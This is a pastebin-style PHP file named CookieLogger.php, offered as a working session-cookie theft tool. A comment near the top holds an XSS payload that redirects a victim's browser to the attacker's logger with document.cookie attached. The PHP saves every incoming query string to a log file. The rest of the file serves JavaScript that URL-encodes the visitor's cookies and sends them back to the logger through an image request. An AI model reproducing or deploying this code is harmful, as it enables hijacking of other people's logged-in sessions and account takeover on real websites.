SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | /* | |
| 3 | * Created on 16. april. 2007 | |
| 4 | * Created by Audun Larsen ([email protected]) | |
| 5 | * | |
| 6 | * Copyright 2006 Munio IT, Audun Larsen | |
| 7 | * | |
| 8 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, | |
| 9 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS | |
| 10 | * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE | |
| 11 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
| 12 | * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; | |
| 13 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
| 14 | * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, | |
| 15 | * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
| 16 | * | |
| 17 | * CookieLogger.php | |
| 18 | * CookieLog.txt | |
| 19 | * | |
| 20 | * PAYLOAD XSS | |
| 21 | * <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script> | |
| 22 | */ | |
| 23 | ||
| 24 | if(strlen($_SERVER['QUERY_STRING']) > 0) {
| |
| 25 | $fp=fopen('./CookieLog.txt', 'a');
| |
| 26 | fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n"); | |
| 27 | fclose($fp); | |
| 28 | } else {
| |
| 29 | ?> | |
| 30 | ||
| 31 | var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>'; | |
| 32 | ||
| 33 | // == | |
| 34 | // URLEncode and URLDecode functions | |
| 35 | // | |
| 36 | // Copyright Albion Research Ltd. 2002 | |
| 37 | // http://www.albionresearch.com/ | |
| 38 | // | |
| 39 | // You may copy these functions providing that | |
| 40 | // (a) you leave this copyright notice intact, and | |
| 41 | // (b) if you use these functions on a publicly accessible | |
| 42 | // web site you include a credit somewhere on the web site | |
| 43 | // with a link back to http://www.albionresearch.com/ | |
| 44 | // | |
| 45 | // If you find or fix any bugs, please let us know at albionresearch.com | |
| 46 | // | |
| 47 | // SpecialThanks to Neelesh Thakur for being the first to | |
| 48 | // report a bug in URLDecode() - now fixed 2003-02-19. | |
| 49 | // And thanks to everyone else who has provided comments and suggestions. | |
| 50 | // == | |
| 51 | function URLEncode(str) | |
| 52 | {
| |
| 53 | // The Javascript escape and unescape functions do not correspond | |
| 54 | // with what browsers actually do... | |
| 55 | var SAFECHARS = "0123456789" + // Numeric | |
| 56 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic | |
| 57 | "abcdefghijklmnopqrstuvwxyz" + | |
| 58 | "-_.!~*'()"; // RFC2396 Mark characters | |
| 59 | var HEX = "0123456789ABCDEF"; | |
| 60 | ||
| 61 | var plaintext = str; | |
| 62 | var encoded = ""; | |
| 63 | for (var i = 0; i < plaintext.length; i++ ) {
| |
| 64 | var ch = plaintext.charAt(i); | |
| 65 | if (ch == " ") {
| |
| 66 | encoded += "+"; // x-www-urlencoded, rather than %20 | |
| 67 | } else if (SAFECHARS.indexOf(ch) != -1) {
| |
| 68 | encoded += ch; | |
| 69 | } else {
| |
| 70 | var charCode = ch.charCodeAt(0); | |
| 71 | if (charCode > 255) {
| |
| 72 | alert( "Unicode Character '" | |
| 73 | + ch | |
| 74 | + "' cannot be encoded using standard URL encoding.\n" + | |
| 75 | "(URL encoding only supports 8-bit characters.)\n" + | |
| 76 | "A space (+) will be substituted." ); | |
| 77 | encoded += "+"; | |
| 78 | } else {
| |
| 79 | encoded += "%"; | |
| 80 | encoded += HEX.charAt((charCode >> 4) & 0xF); | |
| 81 | encoded += HEX.charAt(charCode & 0xF); | |
| 82 | } | |
| 83 | } | |
| 84 | } // for | |
| 85 | ||
| 86 | return encoded; | |
| 87 | }; | |
| 88 | ||
| 89 | cookie = URLEncode(document.cookie); | |
| 90 | html = '<img src="'+ownUrl+'?'+cookie+'">'; | |
| 91 | document.write(html); | |
| 92 | ||
| 93 | < ?php | |
| 94 | } | |
| 95 | ?> |
